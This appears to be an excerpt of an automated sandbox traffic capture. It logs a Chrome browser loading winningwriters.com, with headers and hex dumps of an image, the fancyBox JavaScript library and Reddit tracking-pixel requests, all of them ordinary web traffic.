                                                                                                                                                                                            2024-11-18 20:00:09 UTC686OUTGET /graphics/tomstory/liu_home_page_slide.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:09 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 19:41:24 GMT
                                                                                                                                                                                            ETag: "1f88e-62475059bb42a"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 129166
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 61 90 32 c1 1d 1b 63 b2 9c e9 5c 04 aa d9 c2 d3 db cc 57 73 b9 01 c9 d3 21 40 05 35 19 60 2c 3c 53 f0 d6 b7 66 6e 6f 88 7e 7a c1 d5 d8 da c5 76 fc 7b 89 87 e5 3e b4 51 c8 68 3a ad 33 c0 76 07 67 7e b7 39 0e c7 ed ce cc ed be d6 fd 3c f6 4c eb d9 30 c7 63 c4 f3 dc af 1f 6b c8 f3 2d 60 84 19 22 b9 bd 9a d5 a5 94 4c 05 24 6f cc 47 5a e7 80 dc bd 97 fe aa 5e e4 f6 37 0d 27 0d 1f b4 9d a9 6d 60 a5 85 85 8f 09 66 bc 5d a5 a8 66 22 30 22 8c 79 8a 2d 05 5c 9d d4 a9 a5 70 13 bc 17 fa 98 f2 1d c1 25 c0 f7 3b b0 e0 58 ef 2e 16 7b 6e 7f 8e 5f a7 5b 09 5c 04 d9 e9 43 9c aa eb 5d f2 48 c0 a9 a6 d0 73 18 0e 83 b1 fd 6c fb 14 2c 6e 25 b6 ef e9 78 b9 64 0a 97 1c 6b 3c f1 2c a2 75 f3 81 22 0d 92 50 1f 38 d7 01 ad b9 2f d7 57 66 dc 72 63 87 ec 0e 05 7b b7 9e 75 2d c4 b3 f2
                                                                                                                                                                                            Data Ascii: a2c\Ws!@5`,<Sfno~zv{>Qh:3vg~9<L0ck-`"L$oGZ^7'm`f]f"0"y-\p%;X.{n_[\C]Hsl,n%xdk<,u"P8/Wfrc{u-
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 7a fc 32 c0 42 4f 2f 23 c6 5b c1 ea 5e 5c b9 f3 c7 14 cc 8a 2e 25 94 50 ab 91 98 de b4 a3 1f de 02 a3 3c 02 16 9c 9d df 30 d6 e7 e9 92 6b 98 d9 fe b0 a8 31 2c e3 6d 41 29 50 c0 d4 66 34 f0 c0 58 6c 39 2b 58 9a 49 cc 5e aa b1 22 7e 3a eb 71 6d 94 e9 2a d4 80 3a eb f7 60 36 3f 6f f2 5c 4c 2e 51 2c 5c dc 91 ba de 6a 01 29 5a 80 69 ad 40 a8 d7 2c 05 f2 33 ea a9 62 c0 e5 e7 60 4b 66 47 dd 80 1a 12 68 33 26 9e 3d 70 06 08 49 ca b9 fd da e0 03 52 49 ad 6a 7a d7 ae 00 29 d2 b5 a8 35 eb 80 2e da 75 20 b6 87 2c b5 fe cc 01 4a 1a eb 9f 53 e3 f7 e0 13 65 02 80 6b fd 63 2e b8 04 c2 75 22 84 e4 7a 7c 7c 70 00 c3 c3 5f 0c ba 74 c0 24 52 9b be 74 18 02 ed a5 3c 3a 9e 99 fc b0 00 c3 ca 41 aa 8d 46 00 a4 02 7c 30 12 3b 4f f2 7f 87 d5 6b ff 00 c1 c5 83 e9 ab e1 af 8e 20 ca
                                                                                                                                                                                            Data Ascii: z2BO/#[^\.%P<0k1,mA)Pf4Xl9+XI^"~:qm*:`6?o\L.Q,\j)Zi@,3b`KfGh3&=pIRIjz)5.u ,JSekc.u"z||p_t$Rt<:AF|0;Ok
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 65 80 90 ff 00 f0 36 dd a7 fc df ff 00 65 8b 07 d2 fd 69 ae b8 80 7a e9 80 0f e9 97 c7 01 9a e5 d7 c3 01 84 57 33 f7 e0 33 a0 eb 4d 70 03 f6 7c f0 18 2a 08 23 32 70 03 4c be 07 5c 00 67 96 59 74 f1 c0 61 15 eb 90 eb 5a e0 30 53 a5 7e 3d 72 c0 0e bf 96 bf 0e 83 00 39 81 d7 f0 c0 00 04 0a 1d 7a 0e 98 0c f3 7c 3f ec e0 00 9f 30 cf e7 d3 00 f2 de 94 60 56 a2 be 22 9a 60 25 6d c8 14 ea 7e 59 60 2d 5c 7c b2 25 36 48 54 b7 8e bf 67 86 02 f5 c7 cf 71 48 81 99 83 29 dc 29 ad 7e 63 01 b0 61 b4 b6 e7 23 8a df 96 6a 2a 95 31 5f c5 1a 1b 94 a1 a9 15 3a a9 1a 83 80 5f fe 8a ba 3c 8c 36 7d b9 6b 27 2b 05 ce c5 b6 9e 47 48 e5 90 b8 27 68 56 21 45 08 a6 b8 0d d1 d8 fe d8 77 24 97 16 f7 1c 87 b6 51 f3 2d c6 49 eb 7d 25 e7 2a f6 cb 37 a4 40 28 f6 91 a4 9e a2 9d d5 02 a0 35
                                                                                                                                                                                            Data Ascii: e6eizW33Mp|*#2pL\gYtaZ0S~=r9z|?0`V"`%m~Y`-\|%6HTgqH))~ca#j*1_:_<6}k'+GH'hV!Ew$Q-I}%*7@(5
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: cb 2c f6 8f c7 40 d7 89 2c 4b 6a 77 b4 ca 63 34 54 39 d6 95 a9 c0 79 59 ed af bd d6 b7 fe dd 76 f7 2b de 17 fd c3 ff 00 cb de 49 67 8e 4e 07 9b ee 2e 27 b6 fb 56 c6 f2 39 4c 08 d7 76 fc 4c 73 dc 5d 07 54 f2 a0 ae fd c3 23 80 9c ec 1e ec b5 ed 2f 76 4d 8b 5e f0 57 7c 17 39 04 50 5c f0 5c 6c 57 b1 25 af ab 2f af 6d 23 cf 76 b1 b8 92 32 ea 5a 26 8d 4e c3 d0 e0 3b 69 2d a7 86 28 e4 29 41 ea 01 7b 3c 6b fc 22 e1 a9 90 35 d7 43 80 90 8b 79 6b 8b 58 a0 36 ed 52 62 8d 80 5a 81 98 6f 2e 98 04 ae 2d 6d ed e1 b7 0a 5a 56 79 2a 25 07 79 46 5a 1c c7 c6 b8 04 47 1a 93 4d 71 21 05 98 90 b2 13 4c b7 64 69 fb 70 19 3d b3 db 4d 14 49 19 69 ec 77 ed bb 6a aa b2 6d c8 01 e3 9e 00 23 9e 57 12 2e 61 80 a9 a8 04 93 5a 1c f0 13 76 96 85 4d b5 cc 61 43 10 9f c2 24 02 d5 24 55 49
                                                                                                                                                                                            Data Ascii: ,@,Kjwc4T9yYv+IgN.'V9LvLs]T#/vM^W|9P\\lW%/m#v2Z&N;i-()A{<k"5CykX6RbZo.-mZVy*%yFZGMq!Ldip=MIiwjm#W.aZvMaC$$UI
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 9b ca 85 a6 62 a0 9e a6 84 f8 91 80 93 e3 bb 1b dc 6f 6b 3b 85 39 44 e1 f8 ae 57 98 e0 63 92 f3 86 e2 6e ef 16 e2 da fe 47 a2 81 1f d3 9a ba 8a 92 a5 88 51 4c eb 4c 06 c5 e7 bf 52 12 f2 28 d3 71 b4 b8 e4 ae 04 1f 51 c9 09 2e 20 41 3d 36 5c 0b 7d ee fb 55 1b ca 01 af 8e 55 a6 03 58 77 0f 73 71 3d dd 22 f2 1c dd 9d fd ff 00 26 90 34 16 53 9b b5 92 38 b7 35 45 03 6b 9e 74 d3 01 55 b9 e3 38 39 22 93 e9 2e ee ed a0 75 1b 44 96 e2 59 10 8a 02 b5 57 5a 9e bf 2c b0 10 36 dd bb 1c 8b 3b de db b3 7d 44 6d 14 20 90 47 a5 d3 25 20 96 27 e0 40 c0 58 7b 63 b5 ed ed 8c 10 47 10 fa d2 42 99 14 d2 a1 9a 83 6d 6b 98 d3 2e b9 e0 36 17 71 f6 ad 94 96 16 ab 6d 66 d3 2d bd 0d c4 1b 95 58 28 6a b0 53 91 04 13 ad 09 c0 69 1e ed ed e6 89 ad 4a f1 ed 0b 46 b4 01 55 f7 02 c3 73 12
                                                                                                                                                                                            Data Ascii: bok;9DWcnGQLLR(qQ. A=6\}UUXwsq="&4S85EktU89".uDYWZ,6;}Dm G% '@X{cGBmk.6qmf-X(jSiJFUs
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: e4 59 39 2e d6 b8 64 ba 8f 8e 74 8b 62 3d c5 c4 59 47 2a 83 95 bc 26 83 f7 c8 d3 01 a3 f9 0e e4 8a f7 97 e5 6e 79 ae 60 5d f2 56 31 0b de 7d dd b7 35 bd bf 99 81 92 99 20 a2 9d a9 ad 3a 75 c0 79 e9 79 ce bc bc e7 2b dc b1 20 59 f9 0b a9 ee 6c e5 64 2c f1 b4 d3 16 8d d5 06 b2 00 40 51 43 43 d0 9c 07 6d fb 5f fa 69 ec 9b 88 78 5b ff 00 74 1b 92 ee 5e f2 bd 5f e6 5d ed db f1 df 45 61 c2 76 ed ab b8 68 d3 95 b9 89 5e 7b 89 8a 90 67 8a 16 1b 6b b4 50 8c 07 53 5a 77 6f 68 f6 64 90 f6 87 e9 f7 db ae 2f 8c 9a 6a a3 73 76 76 22 13 3c 8a c0 93 17 aa 4c 8f 0e 55 76 9d f6 d3 a0 d7 01 58 84 47 c3 f3 17 cb 6e 2d fb b7 bc 6e 59 ae 39 be 6d e5 68 ec 38 e7 77 f5 65 d9 33 15 a6 a3 f8 d5 0c 7f 2a 50 66 41 e4 fe e4 dc f1 56 51 f0 dc 6d d0 e7 5c ac 8d cc 72 df c4 b7 86 7b c9
                                                                                                                                                                                            Data Ascii: Y9.dtb=YG*&ny`]V1}5 :uyy+ Yld,@QCCm_ix[t^_]Eavh^{gkPSZwohd/jsvv"<LUvXGn-nY9mh8we3*PfAVQm\r{
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: b8 0c af de 7a e0 33 53 e3 80 ce b9 64 47 4c 06 65 e3 91 c0 67 51 5c 00 e5 e3 42 46 66 98 0c 15 39 7e 60 34 1a 60 04 d4 e5 4f 90 a6 78 00 02 9d 46 03 3a d4 1d 70 18 35 a8 22 be 18 03 1c c6 79 78 60 01 41 d0 10 3e 3e 38 00 3a d6 95 fc 33 c0 28 8a 6a 5b 41 d7 ae 01 dc 42 b9 fe f5 75 d7 f6 53 00 fa 24 42 46 e0 18 fc 46 02 52 07 b7 4a 79 d5 7f e1 a5 4f e1 80 97 87 92 8e 30 3d 34 69 4f ff 00 44 7e 38 07 a9 ca 5e 9c a3 71 6e be 08 33 fb db 00 e6 37 92 5c e5 90 ca c7 ab 31 3d 3e 38 09 48 29 90 03 4d 06 99 60 25 22 ae 5d 29 ae 01 fa 67 50 49 19 6a 29 80 8e bb b8 51 0c b6 5c cc 5e 9d ad c6 51 72 71 a9 68 c3 57 ca 59 75 46 1f 76 02 96 04 b6 d7 31 c8 93 18 ee 6c dc 35 b5 e4 32 15 74 61 a3 c6 f1 90 41 f0 20 e0 3a c7 d8 6f 76 7b f3 9e f7 07 b1 fd bc e4 ac d7 bc d3 ba
                                                                                                                                                                                            Data Ascii: z3SdGLegQ\BFf9~`4`OxF:p5"yx`A>>8:3(j[ABuS$BFFRJyO0=4iOD~8^qn37\1=>8H)M`%"])gPIj)Q\^QrqhWYuFv1l52taA :ov{
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 93 2d d7 72 f2 55 1b be ab b3 6e d2 2b 7e e0 0e c8 b5 a4 2a 23 bd 44 51 f9 e3 6e 87 01 f2 4c 3b e7 b6 79 9b 59 20 b1 e3 f9 0e e8 b0 bb 5a 38 83 89 9e e2 d2 64 61 a8 69 95 51 81 1a 1c 02 5c 2f 1d db 56 52 8b ae 3f db 8b de 0e 44 1f c2 ff 00 90 40 23 07 aa 20 9d 95 09 ff 00 85 46 02 67 98 e3 3b 6f bb 2d a3 e2 fb 83 89 6b 95 62 df 49 6f 73 04 b1 4e 8c da 98 dc 0f 29 23 a0 39 f8 60 3d f8 ff 00 44 9e df ed ee c4 f6 a7 df 2e 7e c7 b2 6c 3b 87 9b ed de f6 e2 65 ec ee f8 e7 61 3c c7 23 c0 a4 7d b4 9e a4 36 12 de 07 30 46 59 83 ec 8f 6d 18 d4 50 e7 80 f6 77 95 ef 8e f9 bf 33 c9 2f 3b 24 4d 23 23 b4 b1 28 86 37 12 d4 b3 2a 26 7b 86 ea 9c c9 3a e0 35 b5 cd aa cf c9 b7 f3 1b e9 af 5e e7 27 bb 91 8b cd b4 1c 89 63 5f cc 7c 34 eb 80 71 c5 f0 1c 9f 2d 2c b0 f1 90 bb 47
                                                                                                                                                                                            Data Ascii: -rUn+~*#DQnL;yY Z8daiQ\/VR?D@# Fg;o-kbIosN)#9`=D.~l;ea<#}60FYmPw3/;$M##(7*&{:5^'c_|4q-,G
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 1a 1b 76 63 52 c1 c1 a7 98 e5 97 db 80 90 b1 fd 41 76 2f 71 40 8d db bc aa 48 54 8d 96 d2 12 92 0a f5 a1 a1 a5 46 01 87 31 ef 17 15 60 55 90 c7 24 d6 de 74 8c 48 a1 5c 8c d8 92 4d 2a 06 87 01 0f db be eb d8 73 11 dd 3a 5f 7d 5c 4e c7 70 49 55 d5 5b 3a 80 c7 30 53 42 34 d6 83 01 3d 75 cd 49 79 00 95 d4 6f 7a fa b3 03 b8 6d a6 40 8a d4 03 e1 80 a8 5d 5d 32 ab 3b a2 a9 35 0d 18 fc 8a 1b 20 74 ad 7e 58 0d 7b cc b8 59 77 23 fa 94 a0 54 ce 95 63 40 33 d0 f8 e0 34 0f b8 3c e8 b4 ed eb 95 32 86 0f 2c 91 6e 06 a9 47 72 95 04 50 9d 34 18 0f 1c bb df 95 3d c1 de bd c9 c9 fa de ac 52 5c 34 16 ef 4c 8c 56 ff 00 c2 1f fd 53 80 ac 1c c9 3a fe dc bf d9 80 29 a8 24 83 a6 01 26 04 ee a9 fc ba 9d 30 0d 9c 0a 90 34 6d 46 01 a3 ae 6c 41 a7 f4 f8 9c 02 1a 64 4e 5e 19 e7 9d 30
                                                                                                                                                                                            Data Ascii: vcRAv/q@HTF1`U$tH\M*s:_}\NpIU[:0SB4=uIyozm@]]2;5 t~X{Yw#Tc@34<2,nGrP4=R\4LVS:)$&04mFlAdN^0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            61192.168.2.1649787151.101.65.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC582OUTGET /pixels/t2_11an1ubt/config HTTP/1.1
                                                                                                                                                                                            Host: pixel-config.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 27
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            2024-11-18 20:00:09 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            62192.168.2.164978466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC863OUTGET /assets/fancybox/jquery.fancybox.pack.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:09 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "5a60-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 23136
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7825INData Raw: 2f 2a 21 20 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 72 2c 47 2c 66 2c 76 29 7b 76 61 72 20 4a 3d 66 28 22 68 74 6d 6c 22 29 2c 6e 3d 66 28 72 29 2c 70 3d 66 28 47 29 2c 62 3d 66 2e 66 61 6e 63 79 62 6f 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 6f 70 65 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 49 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 6d 73 69 65 2f 69 29 2c 42 3d 6e 75 6c 6c 2c 73 3d 47 2e 63 72 65 61 74 65 54 6f 75 63 68 21 3d 3d 76 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74
                                                                                                                                                                                            Data Ascii: /*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){ret
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 76 65 72 66 6c 6f 77 29 26 26 0a 28 68 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 26 26 68 5b 30 5d 2e 73 63 72 6f 6c 6c 57 69 64 74 68 3e 68 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 68 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 26 26 68 5b 30 5d 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3e 68 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 68 3d 66 28 68 29 2e 70 61 72 65 6e 74 28 29 3b 69 66 28 30 21 3d 3d 63 26 26 21 6a 26 26 31 3c 62 2e 67 72 6f 75 70 2e 6c 65 6e 67 74 68 26 26 21 61 2e 63 61 6e 53 68 72 69 6e 6b 29 7b 69 66 28 30 3c 67 7c 7c 30 3c 6b 29 62 2e 70 72 65 76 28 30 3c 67 3f 22 64 6f 77 6e 22 3a 22 6c 65 66 74 22 29 3b 65 6c 73 65 20 69 66 28 30 3e 67 7c 7c 30 3e 6b 29 62 2e 6e 65 78 74 28 30 3e 67 3f 22 75 70 22 3a 22
                                                                                                                                                                                            Data Ascii: verflow)&&(h[0].clientWidth&&h[0].scrollWidth>h[0].clientWidth||h[0].clientHeight&&h[0].scrollHeight>h[0].clientHeight),h=f(h).parent();if(0!==c&&!j&&1<b.group.length&&!a.canShrink){if(0<g||0<k)b.prev(0<g?"down":"left");else if(0>g||0>k)b.next(0>g?"up":"
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7311INData Raw: 6f 76 65 72 66 6c 6f 77 22 2c 22 76 69 73 69 62 6c 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 61 6e 63 79 62 6f 78 2d 6f 70 65 6e 65 64 22 29 2c 62 2e 75 70 64 61 74 65 28 29 2c 28 61 2e 63 6c 6f 73 65 43 6c 69 63 6b 7c 7c 61 2e 6e 65 78 74 43 6c 69 63 6b 26 26 31 3c 62 2e 67 72 6f 75 70 2e 6c 65 6e 67 74 68 29 26 26 62 2e 69 6e 6e 65 72 2e 63 73 73 28 22 63 75 72 73 6f 72 22 2c 22 70 6f 69 6e 74 65 72 22 29 2e 62 69 6e 64 28 22 63 6c 69 63 6b 2e 66 62 22 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 21 66 28 64 2e 74 61 72 67 65 74 29 2e 69 73 28 22 61 22 29 26 26 21 66 28 64 2e 74 61 72 67 65 74 29 2e 70 61 72 65 6e 74 28 29 2e 69 73 28 22 61 22 29 26 26 28 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 0a 62 5b 61 2e 63 6c 6f 73 65 43 6c 69 63 6b
                                                                                                                                                                                            Data Ascii: overflow","visible").addClass("fancybox-opened"),b.update(),(a.closeClick||a.nextClick&&1<b.group.length)&&b.inner.css("cursor","pointer").bind("click.fb",function(d){!f(d.target).is("a")&&!f(d.target).parent().is("a")&&(d.preventDefault(),b[a.closeClick


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            63192.168.2.1649788151.101.65.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC916OUTGET /rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                            Host: alb.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            Server: Varnish
                                                                                                                                                                                            Retry-After: 0
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            content-type: image/gif
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                            2024-11-18 20:00:09 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            64192.168.2.164979366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
